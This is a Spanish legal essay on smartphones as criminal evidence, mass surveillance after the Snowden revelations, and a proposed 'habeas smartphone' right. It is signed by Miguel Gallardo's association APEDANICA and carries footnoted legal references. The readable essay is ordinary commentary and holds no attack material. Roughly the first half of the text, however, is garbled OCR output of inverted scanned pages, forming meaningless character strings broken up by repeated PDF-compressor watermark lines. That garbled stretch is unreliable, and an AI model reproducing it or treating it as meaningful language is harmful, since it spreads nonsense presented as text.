so uT3qO ui u9PuTu5U u UO P'e3TTdmT SouOTouoTTdu T °P op uOT330JTQ uT 'OuOJO[O1. TOP O1uiWJOS T°P uOT3uZTTuflYe u[ opuuqooAoldu 'onb u9Touqu1 u u upuojo ouuoju1 uo uOTouuuTju 13SO JTfl[3uT T
T°°D
T°P
UOTSnT3UOD
optrup op
so
'ioqi
I
sondoid-ouuoJuT io
j ijp oplJsDc[
TL
i°
(g6D
s
«iEO
'iopuoj.o u op aiqwoidas
D
D7
LlÇflsdOU
O'J/dflfl
Dtj
OS
o opvzvnicrn Dq os ouof?lo io,, onb uo]pu onb (96 oTToJ) OpT3 uA N33 TOP ouuojuL T° uo opTuouoo oqooq un 'oi.usqo ou 'so OUOJTO1. T°P OuJos ¡OP UOT3uZTTunYu WJ usnuo ui uo oqsO. 0T1103 oparujoop uq ou 'Sj9-ufl3JAI TS OUuSTUTO3 'Opal3flTOAu.L sond oi.uosns 01 onb ToJSo ucloaruToop Auq °N O3OJiO3 T°
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Copia para APPLE publicada en www.cita.es/espionaje-iphone.pdf ris rios J2N J29JSNV e ouoîoouopod 69165L609 OUOJoo M°n u9iaeqeJ i p p i° eTxleTI ..ioij,.j sorwj u9iJeqeJ re e1
op eip ouxsm
zoptreuio
JOTJN
sojie
op SepeUflJ swJ
oÍoieIIiAJg Ouesiuioo 1°P i'-'°"-''-'° i1od e re°w joqesj ewmoo egop so Jopaq.snnmpy 'TS SNOI33VSNVIJI A SOI3OON IU OAISÑri3X 9flTED iopoloj4 e..ionoN sop e %OOT fl '-'° 0OOTT010d dIU so JopqsTrntupy oÁno '(du) TS 5LOd S3riVRIVS?IdI"J2 oJouoJ,%J SOTIOIIVS3U e %O5 Un UO iÇ 'ouei10 %Q Ufl UO T0UU 'VIU3JAT 3IdOJXl oaouoiod si (si) riI5N35 NQI3VIARIOTNI 03U9fl00T0 OTpouJ uo 000iech uoruno..i eT op opTuouoo í°p eiotou eiomud wJ.
'3ieo
(iij)
°P''-'"PV °'°
o
soi.und So1.uorntS soj uo uotunso.i os uçtoeqeJ ej uo U9T3ed3Jed ,iocFe onb soqooq sorj uçnsnjTp ns Jìipoioe NdPD ns A T3T u9To13qe..T ej uo U9TcYedTotped unso.tcT ns J1paT3e e sepeuimeouo seT3uoTpp seso..iomnu ope3t3eJd ueq os esneo J1.UO3 TO el U3 0131UT JO OSO UOT3T1.SOAUT el OIOITTTA OpTuTp 31T 1110°N Pl°d op UOTSTUJOD eq
aid
lPPP
ZIJ3d OP0lVririIA ri3flNVVT soTorpin so sond
erpod SOT
'iiJ30
ESOF
uoud e 'so;UeAoToJ Uos LreuauuouT 01 onb 'UoTaqe eT op ¿ro.ne oi.unsoid iod oTosiuo. e Oqaoiop flS 0O3 OS S TeP OAOflU
OU
ipod
UO3 ieflUtJUOO poc1'e A
sop
aieoo
'U9TZYeT1SOAUT eT
SO304
s
SOT
Bled
Sol.UeAOT0J
J030leT3SO
iopod
eiecl eTIeSO3OU A o.uoUq2rod SO OpBqSoAUT 011103 ZOPU?UJOd e op OPTUO1.UO3 J0JAI SOTle3 op U9TOBIeT3OP BI -U9ToBqB TB3U U95flJp BJ A oucjojo BPBWBTI BI- sol.ueAoToJ T°P
SOTOIpU! SOp OUOLL1fl3UO3 'TeOT B1.STA
op O.Ufld
TO
OSOQ
(U9ToBqBJ BT op OPTUO1UO3 [0 aqos SOOJ3UO3 SOJTB1.OP OUB op oiqtuoTAOU op ) T? BUO3 ..iod IND A SOUJO1UI SO1.UnSV B BleT3UflUop
sBqonld ieouqej uoiìol
¡
Bsondns
:s?loDiN otjonbod jop BZUBU0A wj,, A (U9T3BqB op oqni.00 op e[ op seTp SO
SOT
B
't'TO
)
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Copia para APPLE publicada en www.cita.es/espionaje-iphone.pdf ouioo
'5 PP p
[jT
u9Toeq'a12 j uoo ( 968(Zgami1.com i einda ) epuj L1fl3 3j opsp L'TO °P aIqtui3ip P T JP P oaLIoD UflU dM0 PP OTIeUOT3UflJ j
1SUUT Un
jp u9toqeJ
ej 3p
L51'T
T T
aquo ocq 38 mus rua ousix
'ssipoud soj 3nb Md.rD U3
ej e .resuod eq 'u9Tunol es p WI TTV 'eis j S3 iOpei1sTUTUTpe e1Çnz 'J4AM3 es3ldmo ej p opos ej eqUofl3U3 35 puop OSS3Td 31J0J4 OiOTJTpo I°P 6 euejd ej U3 OÍoiejjT OTIeSruTO3 ¡3 UO3 'eLTUeUJ ej iod '3tT3UieTA31d 3nb 3DflpOp S3jrA9m SOuoJI31. SO[ 3 3s sasipou3d O1.U3TUIeUOT3TSOd PP OTpfll.S3 J3Q STS3[J ZOUTOD 15 OPT1.S3AUT ¡3 UO3 UO.I3TUflOI OS
'S
sos
SOT j7TQ
op oiquloiAou
3tZT3iJfl iS IÇ PUJ is ssipouod p LT p ¡o onb euLnje MdPO WI OÍOITTTA
'15 OTi5TUTO3 Jop
jiisoiduio
UlOS 'S'e[[O SpO. OpUJiJ.U3 [ SPTn3UTA 'NdFO T TS SNOI0OINOId OIflÒId 'NflSNVW'TV 'pIs rici: XVUNV MOI3V9LLSAMI 5cNOL'TflSMO0
civunio
"v's
'NflSNVJN-qV
ODOJd OiOUT1U A i el ssoidmo sej op OOUOO OUIOO uonj u oso oj000 op eioq S3NOIODVSNV?LL A O9T6 SOI0ODM 0U OAISfl'I3X IfYI0 000uopod onb je 'u9Toeqe1 ej oanpoid os onb ep jo 'eurejj uqm ZOpUUiOj umso erjrnij JOtW SOji3 "ios J2N IISMV op oiqtuou op OSOJ jo L eOJy 'B15 feUOUTtJ.UOS eloied flS 'OIOJeTITA OTieSTuloo TO iod sopezqtn O.UOWfetITqLj OUOJJO). op SOJOUfl)U sorj 'OIOIeTTTA '15 oiiesiuioo fe ePeTnOUTA "15 SMOI00VSMV&L 9f1'I0 OAISflTI0X SOI3OOIN A op iqied e 'Osseurejr e osed PJQJJ XV?LLNV 'oÍiijiA OLIeSTUTO3 jOp 3ÍOi13d 'S?3iO [e3jJ joqesj emiuoo SO Oj eqoj eso op itred y 'zonupON opuopoj TOeJej TOO'L'9T eSeq OflJ JOPJSTUTWPV Ofl3 'TCEJJ XVLLNV U0JPUJ VS MV'1dflIfì VNI0VNkI e ounÍ onb y5 NVNWO V?II3VNH WI 'Vs MVèT3JiO V?13IDNVNIT 13A13flflJfl esoidwo ej op ouepioso.idoi qoj\\ d ej 'U103'ojqTSUosuoToemloJUT so uTqureJ4 op O3TUOO. SO 5OUOflj zOqoUe5 OiO 'OIOiejITA '15 OTJeSTmOO jop SO1eTITUIeJ UO3 U9T3ejOi OUOfl SO1.UOflj zoqoue 'i ¡o onb ewige SO SOJOpeJSIUTLUpe o ' (soi.uonj ZO1[3Lre5 uTnbeop 01P°d UO sOLflO op oun L S13TU9JOjO SOUOT3eSJOAUOD op u9Toeiodnooi UToeqei op sortuos 000ijo onb e3mJoJuT esoicluio)
's
L
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Copia para APPLE publicada en www.cita.es/espionaje-iphone.pdf °T°d
T
op
U.IOJ.U1
uOToqsoAuT
min OUIOO ou A sofeunquj4 so e oAod op soaisiuio soj iod opipoocïe ioqq ioqop fTo1pn1 UO13qSOAUT 011103 Sfl3 os onb soqoot soj onb ouio.qxo un s souoicnJns uos ou 1S
Top
uuuij
'(j) ssoiduio sepuruuoop
5O1.TJOTPUO3SOP
A (gi.7j) OÍOITTTA
A
opoq
S OTISTUTOO
[0
jno 'ioq
'.tolnut
îpoio arad uoo oonpj.
op U9pJfl3UA
ssoiduio spuiuuo;op
UO3
u9T3Jfl3uA oiqos sfl3 op 'ouoiooj o sopiode dND ¡op souiouj sounsy op SOT3TJO so] optjuos oso u sìsoiduio op opmaquo OSO op UOTO3tLfl.5u03 onb SOU0Wfl30 SOJ op1Odt3 um os ou 'so o.so 'iopo;u oqo so[BunqLn. osTpm Oqooq ¡o onb -joi.n-3 WSW u9T3qsoAuT op soipocu soi.o n A s000nl SOJ op u9rolsodslp 1oiqe oi.uonj min opzqqn SOTT31J0 OS
IS
S0.fl.S
01 SOT
OUTTXUT
UOEOI3OS
OU A
ojoo
'pTpO1O
uoToTnouTA
JO SOUIO3OUO3SOU
spurmj
3
T
op
O1.uOUJOl.UOI3TJflS
SpUrJJ
o.00dsoj
OIOITTTA
seplpuold'Luoo
SO OU
J
pT1oJo1
SESO Op OPEUO1.UO3
oi.unsoid io ouo
1oi.n
A
ujso Oqooq opunos ouoTpuodsonoo
i
T1UoUiflo0P
u opodos
TO '93LL os A otuoo 'pvpoJ. op;iod q os ou sond oqmj uoTouomn3Op uo uosns os oÍoiip S TOP TUOWUOS 1oid T A oJqTsuo uçnoeuuojuj oi.uo uoT0os u9TcYJnouTA u9izYeqa1 i op .xone ios op osoqoodsos ts 000uoosop o íqat. olpoul oso ar 'ZopUU1Oj IOTJAJ s To op OpTUO1.UO3 TOP u9TsnJTp eT op OT3TUT To 110 135O 'OCOIeTTTA Ts i opeJnouiA ouoarjsondns 'uoiomiuojui op oipoul un onb op eop souoT3ezteuT SoUoLflTs sej 0S1O312 J eAode oqooq .iouiud crep os onb 'soqooq soi.so e
T
uoqop
'sop.ei.uo3 iod
izrrI) «frTO
¡o op.rnnp uçnsofaic[ op ooync[woo op aIqwaiaot op s r y1 y tTO op alqwoiaoii ns y oJauaaI i os fi r yfj soopiinwjvoiziaunrnqoiso OP L T yjp ¡o 'yJoSOd uqos voziaIIç) oauoo olino) so onupipao O1.Uflípe OA'FqOie onb rnouapiao os,, sondo1d-ouuoJuT T°
UO
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Copia para APPLE publicada en www.cita.es/espionaje-iphone.pdf soj uo
u1qq
o
sstpouod
uos
sosondod
SOT
O
SOA
onb uono uo osuoj4 ouop000..icT so ou uouodo.icl os onb suosod sìj op osoi sopuTsoAuT ouioo U9T3BiJ3Op qooi oínpoid os ouigo iuqnosop oprnosuo3 onb 01 iod u9ioqaL SOALT WJ op U913 OU
ZOTd
SO Op
oi.olqo
sotooq
SO
SOUVL1VDN
SQ'I
U
OLSI
poT3id ZOA Ufl zopuLuoj 10W -'S T°P UOi3iI3OP xTnsoi pond onb oj op oToinriod uTs 'o19.ijnA Is O1ESIUO3 T
I ro
E.IUO3
'opid
ipp
UOpBS9AU p
SO3U oso
UE4SX
311b
nd
0U103 9JU93IJflS
E.I3psuo3
osondxo
OU
'T3ST
10d
01
oÍ\suom ¡°P
oi.d000..i
TOP
iopuopio
io uo 'oloojop ns uo 'o oi.uoipuodsoioo ¿ropTiuos o uo oppin TUIO oísuoîn uo opTuouoo ns iqoiduioo Joqop onb OpTUO.UO3 ns ootmioJuT oi.uod un opuodsonoo iuurxo arad oiqos irniuojui o ouisiui eOiUo9 1000qeo Jp so opeoTpuT m ooruoi000 ooiioo op osuom op JoTd000l SAU 0q39q j OEjfl3UA 9U9UIEUIU E.flUOfl3UQ ON Op uoo soaraiuoouo onb op ojnosqo 3S op sau sOU SUI ZOA Ufl 'L17T IT dN3 op or.wuoîounj ro iod opqTooi ooTu9i.00Jo oonoo op oCsuom o oiqos ompl 1Od T
osi.
opnd onb oj op u9TunoJ sondns so uo opuouoo jo soTu1000uoosop u uid 6 i uo uqaquoouo os souojoi. soj onb osipoio opond onb op op;jnso ¡ uoo os Touod so ig oim uo oTuod un iod opejop sm oqonui oipnl.so un osiooq 'oonj opsop 'Joqop 'suTd OP 'oSSOTd oiioj ujd epio uo umso onb .irpoio j op uisim un uo uqaquoouo os souojjoi. msui ipod 'oidiouud uo 'suoi.0 o T
opuoi.oid os i so onb po..io
iso
oqdui iod oporqno op oqooq jo oso loTnbjeno u uo1u oTp1 un os onb ooToI 000ii3d oiod o.ioqoi os onb op n1oqoo op orp io soru000uooso t'T T ) sojrA9m soj op suoìu op oìuoiuirniororsod t° opeipnso ZOA eun o1npod opTpo.io ouomouoioijns so ou os onb oonpop NdP3
'i
'ossoTd ouoJ4 op Tu1d 6
1
uo u9runol 'oqooq
100101. 13
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Copia para APPLE publicada en www.cita.es/espionaje-iphone.pdf ins) pap3qi[
u9E3cj un Sq3Tp
OjD
uompunJ soqoiop ornoo 's op os :ojqqnosip onb
ozid
'i''
u2d
sw
I3PnÇ upTozuon
UAOJJ ÁTnUJ uos sI3tIoTTIP j
'suiopy
1Ios !s .iod i3SO flO stiosod os 'op000d ou SOpSOAUT 01X103 U9TOEJJOOp oTpom A -e o3odsoJ ssondaid Si3uoTTTP swj s?mop OpsOp OiJ oLj- un ooq uoiorpoons soqooq soj u9To33Tuniuoo 5OAflTO1 Ufl OpTllfloSiiafl. 's3TUOfl30I0 S3U0T33TT1flUIO3 SJ Aoj op uçnsoo j oPduiT 'oqrno op si op LooI p3TJfl.Sfl[ So OU '3TUOqOoJo 001103 Op 50131A.TOS
sI
sop
usoid
WI
ouoiurpuu ouoipuodsauoo i° ournpou onb sejipduioo s_ A soornçupop S3TU9fl.30JO SOUOTOOTUnUIOO sns op uoiouoj.qo puodns onb ppput).uT soAtlîsodsTp sns op UOToUOA1O.uT i uomepunj oqooiop jo uo A souoroornnmoo jop oi.000s r uo SUO3 OTflOO oqooiop o cro uoTsTmo.fl.rn WI souoTonp SO3TUOJ3ofo soTpoln U0 OprnluoJui T[ oppouo ¡O OSflJOUI onb op U9T3T1SOAUT 'oqooq OSO oiqos [°!P1 U913 fl.SOAU un osixo onb OUO1.OU A ooijqid 50 opUrn-lo oaix?JN SOjqqO1dUIT onb so31u91130J0
sj
T
0;UOUI[ UOS oqoot.j oso op sOitSoA soAtsodsTp S0[ UO O OTIT3TUXOP
'osod UO
Oifl 0pJ3U0
oso onb op sopepijqsod swj zopuuioj °JN 1S i u9ioDnpoJd SOTOTpUI 50Uflf UO1.SXO 019S T°TT fls op uionqu j U9Toqw2 sondns a olnpoid os onb opsop oipoui A oi un 0U1fl35UJ
id
op SUT
S0IS
U
SJOUVJSèId
U
H OOINQN XEI'TII 03N103 cE OI3IA?1IS 50T[ V 5ONIVsIVUNVI A SOALLISOdSIU
MOI3NA{LNI U
SOflI3IJA[OU
OLLSID3i
A
SVSidW
A
VUVIJN
SVIDNOIIU
U
U9io3q11 j omnpoid os onb jo iod opom [O SOUJO3OUO3SO ponb oaodm pTpo10 onb UO O1UOUTOUJ [O OSO tsnio SO op o;oíqo soqooq soj uo U9icYdToT1.icT ns onb nb iToop oi.sq so[ioTjod 5OTIUOT3UnJ SO[ OIOIJOJ OS onb 0j 10d Ouoiu1uqnoSop Op 01.IIOP Ufl 1TflSUOO .5OO1DOS Op U9I3jOAO1 A
ojr uçYpqar opond oioos [T3Tjo U9plflol un oqos un op u9TsnJTp sond 'osso iod oso OSITprqSO op pqq onb [ 0;STA ioqeq OUJOI1.XO 'UOT3ULT0JUI J 3 qooiop JO iod iod U9I33TUflUIO3 op sopom
'pidui
ppod os U9i3n1.o
ns onb
0j
http://www.cita.es/flexispy-fiscal.pdf www.cita.es/querella-flexispy www.cita.es/flexispy-juzgado PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor tr?moJ Ties
OSUOJTV
:op
IP Copia para APPLE publicada en www.cita.es/espionaje-iphone.pdf SOUOI3fl13
sq op oaioos jop ouoiuruoj jo sojo.uT og zoputuaj 0A[S 3 SOji3 op OPT1.SOALII 011103 U013IT3OP
bITAI
NcIPO Ej op OV.13S9 ¡O UO SEj stpo; E ouodo os
SES9fldoId U93Efl3E op SE3UOflp
'ivsi
'J
1OUO1.LT
Oj
opol. JOd
[3SM opasiurJN o aid sojqTs1rnpuI ouowpn 'SAt.3OdS0Jd,, ST3TJOTTIP SpCUJJ 'T OJD Z0f1flU 110 LTIU0 'os000d op oofqo o oArntsuoo ou0mioppJoi onb o[op o1.iqui jo optrai:odns onb srnoUorp stunp op ¡EsG3od U0fl3 110 osJouo:I. uoqop U9pEOIJ;SflÇ Ej JIUIITOP op ioq souoroJopLSuo3 S2J op sqoni o1.UoUI[UTJ T
S0JO1Joj.t.r
Un uo st).Tiare iuoo i
iuo
A
sopuounptinj iod
A
SOLT3OJOP
LIIJOS
so ou
SOT
0Lj3010Q op opìs so] op u9pp!i0SU03
iuod os000d
SopLIoi3BTOJ O).U0UITIS 03011 OU soi.uouboro
'sopet.soAUT oqooq
0UoUIp0.
opinuo
1103
lop SOLIIJ So 1103 SAISfl.ITUT 105 iod
110
u9iobodoldsop flS iod
:sojqzqooi
onb iropisUoo STTflb so onb oprnsomsop oqur SSO
STOUOTTTP
'opuTdop
UOfl3 110 OpUolUol. A 'UOT3tJ.SoAUT
T
OP
Sj
sop) pprtut.ui (so.qsioi)
A
SOAtJOJ (soiuoipoo SoLIOT33iLIflUJO3 SoU0T33TUnUbO3 S3j op oi.oioos TO
oqooiop
T
A
'(souoiauoi.op JoTqnq
ppTJTqjoTAUi
OTJT3TTJJOp TOP
Copia para APPLE publicada en www.cita.es/espionaje-iphone.pdf
ENTIDAD ASOC PARA LA PREVENCION ESTUDIO DELITOS ABUSOS NEGLIGENCIAS EN INFORMATICA - CIF G80593254 - NOMBRE GALLARDO ORTIZ MIGUEL ANGEL - NIF 07212602D
Firmado digitalmente por ENTIDAD ASOC PARA LA PREVENCION ESTUDIO DELITOS ABUSOS NEGLIGENCIAS EN INFORMATICA CIF G80593254 - NOMBRE GALLARDO ORTIZ MIGUEL ANGEL NIF 07212602D Nombre de reconocimiento (DN): c=ES, o=FNMT, ou=FNMT Clase 2 CA, ou=703015345, cn=ENTIDAD ASOC PARA LA PREVENCION ESTUDIO DELITOS ABUSOS NEGLIGENCIAS EN INFORMATICA - CIF G80593254 - NOMBRE GALLARDO ORTIZ MIGUEL ANGEL - NIF 07212602D Fecha: 2016.08.06 19:58:27 +02'00'
HABEAS SMARTPHONE, HABEAS AUDIO Y HABEAS DATA PROBÁTICA CRIMINALÍSTICA EN TELEFONÍA CELULAR AVANZADA Y SU ESPIONAJE
Dr. e Ing. Miguel Gallardo , criptólogo y perito judicial privado en España y Avv. Achille Campagna , abogado y notario ejerciente en San Marino / Italia, por Asociación @APEDANICA Tel. (+34) 902998352 y Email: apedanica.ong@gmail.com El derecho penal contemporáneo, en la práctica, encuentra sus límites en el enjuiciamiento de lo que puede llegar a ser probado. Los viejos fundamentos teóricos del derecho romano se enfrentan a un nuevo escenario creado por aparatos que caben en el bolsillo y se integran en redes hipercomplejas. Entre Ulpiano o César y Google o Apple, existe una cambiante fenomenología que obliga a replantearse la doctrina aplicable en cada caso en el que un smartphone afecta o es afectado por un conflicto de derechos en los que los esclavos no tienen, o no están autorizados a utilizarlos, mientras que plebeyos con Android y patricios con Apple iPhone libran batallas desiguales en las que de vez en cuando un Espartaco amenaza a la Roma eterna hasta la invasión de los bárbaros. Las combinaciones de hechos y derechos relacionados con la telefonía móvil o celular son inabarcables, pero en lo que sigue se ofrecerán algunas definiciones intentando dividir categorizando situaciones de hecho en precedentes, bienes, daños y riesgos del derecho penal contemporáneo relacionables con los teléfonos móviles o celulares “smartphones”. ¿Qué es un “smartphone”? Google (y algo sabe de ellos) lo define así: smartphone, nombre masculino Teléfono celular con pantalla táctil, que permite al usuario conectarse a internet, gestionar cuentas de correo electrónico e instalar otras aplicaciones y recursos a modo de pequeño computador. sinónimos: teléfono inteligente Esta definición simplifica una realidad que determina y condiciona la actividad diaria de los profesionales del derecho probablemente más que ningún otro aparato lo haya hecho antes desde la invención de la imprenta de Gutenberg. Como decía Wittgenstein en su Tractatus1 “lo que puede mostrarse no puede decirse” y cualquier descripción de lo que es o no es un smartphone se ve ridiculizada por obsoleta y simplista en poco tiempo. ¿Qué puede hacer un “smartphone”? Quienes llevan tiempo utilizando uno y exploran sus límites tecnológicos saben que el potencial es inabarcable porque hasta los más expertos se sorprenden por las innovaciones que compiten como aplicaciones (apps) disponibles en las tiendas virtuales, pero en principio, un smartphone puede hacer prácticamente todo lo que puede hacer un ordenador personal, en cualquier lugar y por supuesto, el smartphone, tanto si es básico en uso muy primitivo, como si es de última generación utilizado por un sofisticadísimo hacker, no deja de ser también un teléfono. Tractatus LogicoPhilosophicus 4.1212 (English) kfs
1
www.kfs.org/jonathan/witt/t41212en.html 4.1212 : What can be shown cannot be said . Lo que se puede mostrar no se puede decir.
Por lo tanto, todo el derecho informático y telefónico tal y como se les concibe hasta ahora, es parte del derecho de los smartphones, pero su pequeño tamaño, altísima disponibilidad en uso masivo y la creciente complejidad de sus sistemas en red han hecho explotar una casuística y una fenomenología que sorprende sin preparación alguna a los juristas más tecnológicos, en situaciones límite. La integración de audio y video con datos y metadatos en un pequeño aparato que cabe en un bolsillo ha creado un nuevo escenario jurídico y una problemática en la que el perito puede alterar cualquier enjuiciamiento posible. ¿Cuáles son los principales riesgos y oportunidades para el jurista? El “habeas data” forma parte de las modernas constituciones y se desarrolla en los ordenamientos jurídicos de todos los países, actualmente. El derecho comunitario europeo emite directivas que se transponen a las legislaciones nacionales y el Tribunal de Justicia de la Unión Europea ha dictado muy relevantes sentencias que afectan a los datos personales así como al mercado y a los consumidores intentando protegerles de monopolios u oligopolios y abusos de posiciones dominantes. Sin embargo, la realidad es que existen dos modelos de sistemas que se han impuesto, el elitista cerrado del Apple iPhone y el gran conquistador de industrias y mercados de Google Android. No hay medallas de bronce en unas tecnologías tan competitivas que han extinguido por extenuación a líderes anteriores con productos diferenciados como Nokia (symbian), Blackberry, Motorola y hasta a la mismísima Microsoft. Las guerras de patentes en el más cruel derecho industrial, la competencia más feroz y tramposa crean litigios nunca antes vistos ni imaginados entre Apple, Google, Samsung, Oracle y Microsoft, entre otros grandes monstruos, y de ellos con gobiernos o instituciones supranacionales como la Unión Europea, así como con todo tipo de consumidores y usuarios. Hasta la más simple de las redes sociales y por supuesto Twitter, FaceBook FB, Google+ G+ y sistemas de comunicaciones multimedia como Whatsapp o Telegram, generan por sí mismas, y en su relación con millones de smartphones, un nuevo mundo en el que parece que los juristas llegan con retraso, pereza, miedo e ignorancia, a veces (mal) deliberada2. Espionaje masivo de smartphones Pero desde las revelaciones de Edward Snowden3 sobre el uso y abuso de los metadatos por parte de las agencias de seguridad o servicios de inteligencia como la National Security 2
Sobre el concepto y la jurisprudencia de la ignorancia deliberada, citando la STS Sala de lo Penal de 9 de junio de 2015 ( rec. 1665/2014) ver http://www.miguelgallardo.es/ignoranciadeliberada.pdf 3 E dward Snowden Wikipedia, la enciclopedia libre
https://es.wikipedia.org/wiki/ Edward _ Snowden Edward Joseph Snowden (Elizabeth City, 21 de junio de 1983) es un consultor tecnológico estadounidense, informante , antiguo empleado de la CIA (Agencia Central de Inteligencia) y de la NSA (Agencia de Seguridad Nacional). En junio de 2013, Snowden hizo públicos, a través de los periódicos The Guardian y The Washington Post , documentos clasificados como alto secreto sobre varios programas de la NSA, incluyendo los programas de vigilancia masiva PRISM y XKeyscore
Agency NSA, el derecho no ha reaccionado ante el espionaje masivo del que todos los usuarios de smartphones son víctimas, lo sepan o no. En España, la Audiencia Nacional se negó a enjuiciar4 los hechos revelados por Snowden y no constan resoluciones judiciales relevantes sobre el espionaje masivo de la NSA en ningún país del mundo. Tampoco abrió expediente5 la Agencia Española de Protección de Datos AEPD ni se conoce que otras autoridades garantes de la privacidad nacionales ni europeas como el Grupo de Trabajo del Artículo 29 (GT 29), creado por la Directiva 95/46/CE de la Unión Europea6 ni el tribunal de europeo de Derechos Humanos7 lo hayan hecho, al menos eficazmente, hasta ahora. Más allá de la normativa y la jurisprudencia europea, se ha debatido en las Naciones Unidas sobre el derecho a la intimidad como un grave problema de la humanidad actualmente. El artículo 12 de la Declaración Universal de los Derechos Humanos, dice: “ Nadie será objeto de injerencias arbitrarias en su vida privada, su familia, su domicilio o su correspondencia, ni de ataques a su honra o a su reputación. Toda persona tiene derecho a la protección de la ley contra tales injerencias o ataques ”. Algunas revelaciones de Edward Snowden señalaban a las mismas Naciones Unidas y a sus más altos representantes como objeto y objetivo del espionaje de la NSA. No solamente fue una cuestión de principios, sino una reacción al espionaje de cargos y funcionarios la resolución A/RES/68/167 “El derecho a la privacidad en la era digital”8 es pura filosofía moral y política internacionalista que, después de afirmar, reafirmar, observar, acoger, reconocer, destacar, poner de relieve9 (verbos mucho más filosóficos que los que se emplean en los códigos civiles, administrativos sancionadores o penales), ¿concreta la actuación de la ONU sobre el espionaje masivo? HABEAS SMARTPHONE y sus habeas metadata/data/audio/video Aunque no debe confundirse el derecho con el enjuiciamiento para fijar ideas y concretar los paradigmas documentables de la problemática jurídica y pericial de los smartphones, pueden referenciarse algunos casos controvertidos que no sirven de precedente ni de jurisprudencia válida, porque, vistas en perspectiva histórica las resoluciones judiciales, de la misma manera que el derecho informático de los años 80 no producía autos y sentencias sostenibles pocos años después, muy probablemente las primeras resoluciones sobre smartphones tampoco estén creando doctrina científica y jurídicamente sostenible10. 4
La asociación APEDANICA presentó la querella que puede verse en http://www.miguelgallardo.es/querellansa.pdf agotando los recursos de reforma y apelación. Los documentos judiciales relevantes constan como anexos A2. de la tesis doctoral de Miguel Gallardo en http://miguelgallardo.es/tesis.pdf 5 La denuncia http://www.miguelgallardo.es/aepdbooz.pdf se presentó contra la empresa Booz Allen Hamilton en la que trabajaba Edward Snowden, siendo particularmente relevante el recurso de reposición contra la resolución de archivo en http://www.miguelgallardo.es/recursobooz.pdf 6 D ata Protection D irective (95/46/EC) EURLex Europa.eu en castellano en http://ec.europa.eu/justice/policies/privacy/docs/9546ce/dir199546_part1_es.pdf y en todos los idiomas europeos en http://eurlex.europa.eu/legalcontent/EN/TXT/?uri=URISERV%3Al14012 7 Hay al menos dos referencias en el Tribunal Europeo de Derechos Humanos Application no. 24960/15 en http://hudoc.echr.coe.int/eng?i=001159526 y Application no. 58170/13 en http://hudoc.echr.coe.int/eng?i=001140713 8 Organización de las Naciones Unidas http://www.un.org/es/comun/docs/?symbol=A/RES/68/167 9 Pág. 69 y ss. o.c. http://miguelgallardo.es/tesis.pdf 10 En agosto de 2016 la palabra “smartphone” es citada en 67 resoluciones de la jurisprudencia del Consejo General del Poder Judicial en http://www.poderjudicial.es/search/indexAN.jsp
Así las cosas, ha de proponerse alguna definición, aunque sea provisionalmente, para el derecho de los smartphones, diferenciando las teorizaciones especulativas, de las cuestiones y dilemas que afrontan jueces, fiscales y abogados cuando un smartphone es mencionado, o si ni siquiera se menciona pero afecta a hechos relevantes y derechos en un procedimiento judicial. De este derecho del smartphone, un elemento conceptual es el “habeas”, en el sentido latino de “tener presente”, a semejanza de lo que se expresa en latín casi universalmente con el “habeas corpus”, especialmente cuando el juez tiene presente que existe un smarphone y que las acciones u omisiones judiciales pueden afectar a derechos fundamentales de la persona, los colectivos, las sociedades e industrias e incluso a la soberanía de las naciones y al orden económico mundial. No se trata aquí de detallar todas las tecnologías intrusivas, ni siquiera las que pueden afectar a un teléfono en cualquier país. Deliberadamente se obvian las intervenciones telefónicas clásicas en sistemas equivalentes al SITEL en España, aunque la inmensa mayoría de las escuchas de las que se tiene conocimiento en sedes judiciales dependan de grandes sistemas centralizados que afectan por igual a teléfonos fijos y móviles o celulares, y en estos últimos, incluso con geoposicionamiento retrospectivo bien referenciado11. Pero no es una cuestión menor el acceso masivo a todo lo intervenido por orden judicial para el rastreo de indicios mediante inteligencia artificial sobre reconocimiento de voces12. La categorización fenomenológica de lo que aquí denominamos “HABEAS SMARTPHONE” 13 debe diferenciar hechos y riesgos, internos y externos, propios y ajenos, legales e ilegales. Pero reiterando que el derecho penal contemporáneo, en la práctica, encuentra sus límites en el enjuiciamiento de lo que puede llegar a ser probado. Los supuestos y las especulaciones teóricas pronto se alejan de la realidad judicial, en la que cada vez son más los smartphones incautados que pasan años sin ser analizados, se tiene conocimiento de impunes intervenciones intrusivas extremadamente perversas y unas pocas personas jurídicas, especialmente un grupo de multinacionales que compiten y cooperan para repartirse un mercado en el que también tratan de protegerse de los intentos de los gobiernos de controlar a quienes controlan a quienes controlan o “metacontrolar”. Desde el robo casual y fortuito de un smartphone que resulta tener datos, audio o vídeo de sensibilidad y riesgo para su propietario pero también para terceros, por ejemplo, si se trata de un abogado cuyos clientes han confiado sus secretos representados en whatsapps o conversaciones o imágenes recuperables, hasta las más excepcionales leyes aplicadas por servicios de inteligencia como la National Security Agency NSA y la Central Intelligence Agency CIA en la lucha contra el terrorismo y el crimen organizado internacional, existe una 11
Sobre SITEL en España http://cita.es/escuchas y documento www.cita.es/sitel.pdf La misteriosa empresa española AGNITIO se dedica a ello. Pueden encontrarse 184 referencias en los archivos de HackingTeam, 21 en G lobal Intelligence Files y 6 en The Spy Files según consta en https://search.wikileaks.org/?q=agnitio 13 L a frase legal que aquí se propone se utilizaría en latín, cuya traducción más literal es «tener 12
el smartphone presente» siendo «hábeās» la segunda persona singular del presente de subjuntivo del verbo latino «habēre» (en este caso entendido como «tener»). Es clara la analogía con el “HABEAS DATA” que entre otras fuentes, se trata en https://es.wikipedia.org/wiki/Habeas_data
